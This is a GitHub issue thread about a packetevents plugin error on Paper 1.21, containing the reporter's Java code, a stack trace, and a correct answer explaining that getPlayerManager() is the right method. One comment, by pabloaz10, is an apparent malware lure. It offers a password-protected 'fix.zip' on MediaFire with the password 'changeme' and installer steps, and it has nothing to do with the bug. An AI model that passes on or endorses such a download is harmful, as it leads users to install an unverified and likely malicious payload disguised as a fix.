### ISSUE TITLE
Packet sending throws an error

### ISSUE THREAD

**Issue by GoodestEnglish** [retrooper/packetevents#969]
**Describe the bug**
When I try to send a packet `PacketEvents.getAPI().getProtocolManager().sendPacket(player, packet)`, error occurs.

**Software brand**
Paper 1.21

**Plugins**
AntiBreakPainting, FastAsyncWorldEdit, packetevents, spark, ViaBackwards, ViaVersion
(AntiBreakPainting is the plugin I used to test my code)

**How To Reproduce**
1. Join with the 1.21.1 minecraft
2. Sneak
3. Error occurs

**Expected behavior**
NameTag color change

**Screenshots**

**Additional context**
My Code:
```java
public class Main extends JavaPlugin implements Listener {

    @Override
    public void onEnable() {
        getServer().getPluginManager().registerEvents(this, this);

        PacketEvents.setAPI(SpigotPacketEventsBuilder.build(this));
        PacketEvents.getAPI().load();
    }

    @EventHandler
    public void onSneak(PlayerToggleSneakEvent event) {
        Player player = event.getPlayer();
        WrapperPlayServerTeams packet = new WrapperPlayServerTeams(
                "hello",
                WrapperPlayServerTeams.TeamMode.CREATE,
                Optional.of(new WrapperPlayServerTeams.ScoreBoardTeamInfo(
                        Component.empty(),
                        Component.empty(),
                        Component.empty(),
                        WrapperPlayServerTeams.NameTagVisibility.ALWAYS,
                        WrapperPlayServerTeams.CollisionRule.ALWAYS,
                        NamedTextColor.BLUE,
                        WrapperPlayServerTeams.OptionData.NONE
                ))
        );
        PacketEvents.getAPI().getProtocolManager().sendPacket(player, packet);
    }

}
```
Error:
```
[21:48:55 ERROR]: Could not pass event PlayerToggleSneakEvent to AntiBreakPainting v1.0.0
java.lang.ClassCastException: class org.bukkit.craftbukkit.entity.CraftPlayer cannot be cast to class io.netty.channel.Channel (org.bukkit.craftbukkit.entity.CraftPlayer and io.netty.channel.Channel are in unnamed module of loader java.net.URLClassLoader @484b61fc)
        at packetevents-spigot-2.4.0.jar/io.github.retrooper.packetevents.netty.channel.ChannelOperatorModernImpl.pooledByteBuf(ChannelOperatorModernImpl.java:115) ~[packetevents-spigot-2.4.0.jar:?]
        at packetevents-spigot-2.4.0.jar/com.github.retrooper.packetevents.netty.channel.ChannelHelper.pooledByteBuf(ChannelHelper.java:97) ~[packetevents-spigot-2.4.0.jar:?]
        at packetevents-spigot-2.4.0.jar/com.github.retrooper.packetevents.wrapper.PacketWrapper.prepareForSend(PacketWrapper.java:224) ~[packetevents-spigot-2.4.0.jar:?]
        at packetevents-spigot-2.4.0.jar/com.github.retrooper.packetevents.wrapper.PacketWrapper.prepareForSend(PacketWrapper.java:247) ~[packetevents-spigot-2.4.0.jar:?]
        at packetevents-spigot-2.4.0.jar/com.github.retrooper.packetevents.manager.protocol.ProtocolManager.transformWrappers(ProtocolManager.java:107) ~[packetevents-spigot-2.4.0.jar:?]
        at packetevents-spigot-2.4.0.jar/com.github.retrooper.packetevents.manager.protocol.ProtocolManager.sendPacket(ProtocolManager.java:116) ~[packetevents-spigot-2.4.0.jar:?]
        at default-maven-project-1.0-BETA.jar/me.GoodestEnglish.Testing.Main.onSneak(Main.java:47) ~[default-maven-project-1.0-BETA.jar:?]
        at com.destroystokyo.paper.event.executor.asm.generated.GeneratedEventExecutor18.execute(Unknown Source) ~[?:?]
        at org.bukkit.plugin.EventExecutor$2.execute(EventExecutor.java:77) ~[paper-api-1.21-R0.1-SNAPSHOT.jar:?]
        at co.aikar.timings.TimedEventExecutor.execute(TimedEventExecutor.java:77) ~[paper-api-1.21-R0.1-SNAPSHOT.jar:1.21-37-dd49fba]
        at org.bukkit.plugin.RegisteredListener.callEvent(RegisteredListener.java:70) ~[paper-api-1.21-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperEventManager.callEvent(PaperEventManager.java:54) ~[paper-1.21.jar:1.21-37-dd49fba]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.callEvent(PaperPluginManagerImpl.java:131) ~[paper-1.21.jar:1.21-37-dd49fba]
        at org.bukkit.plugin.SimplePluginManager.callEvent(SimplePluginManager.java:628) ~[paper-api-1.21-R0.1-SNAPSHOT.jar:?]
        at net.minecraft.server.network.ServerGamePacketListenerImpl.handlePlayerCommand(ServerGamePacketListenerImpl.java:2541) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.network.protocol.game.ServerboundPlayerCommandPacket.handle(ServerboundPlayerCommandPacket.java:46) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.network.protocol.game.ServerboundPlayerCommandPacket.handle(ServerboundPlayerCommandPacket.java:18) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.network.protocol.PacketUtils.lambda$ensureRunningOnSameThread$0(PacketUtils.java:36) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.TickTask.run(TickTask.java:18) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.util.thread.BlockableEventLoop.doRunTask(BlockableEventLoop.java:151) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.util.thread.ReentrantBlockableEventLoop.doRunTask(ReentrantBlockableEventLoop.java:24) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.doRunTask(MinecraftServer.java:1478) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.doRunTask(MinecraftServer.java:201) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.util.thread.BlockableEventLoop.pollTask(BlockableEventLoop.java:125) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.pollTaskInternal(MinecraftServer.java:1456) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.pollTask(MinecraftServer.java:1449) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.util.thread.BlockableEventLoop.managedBlock(BlockableEventLoop.java:135) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.managedBlock(MinecraftServer.java:1408) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.waitUntilNextTick(MinecraftServer.java:1415) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1260) ~[paper-1.21.jar:1.21-37-dd49fba]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:329) ~[paper-1.21.jar:1.21-37-dd49fba]
        at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]
```

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KoutaChan** [comment]
As you can see from the error, this method requires a `Channel`. The correct way to send packet using the Bukkit player is  `PacketEvents.getAPI().getPlayerManager().sendPacket(player, packet)`

**Comment by GoodestEnglish** [comment]
> As you can see from the error, this method requires a `Channel`. The correct way to send packet using the Bukkit player is `PacketEvents.getAPI().getPlayerManager().sendPacket(player, packet)`

Oops, thanks for pointing that out! Didn't realize I did a typo :p
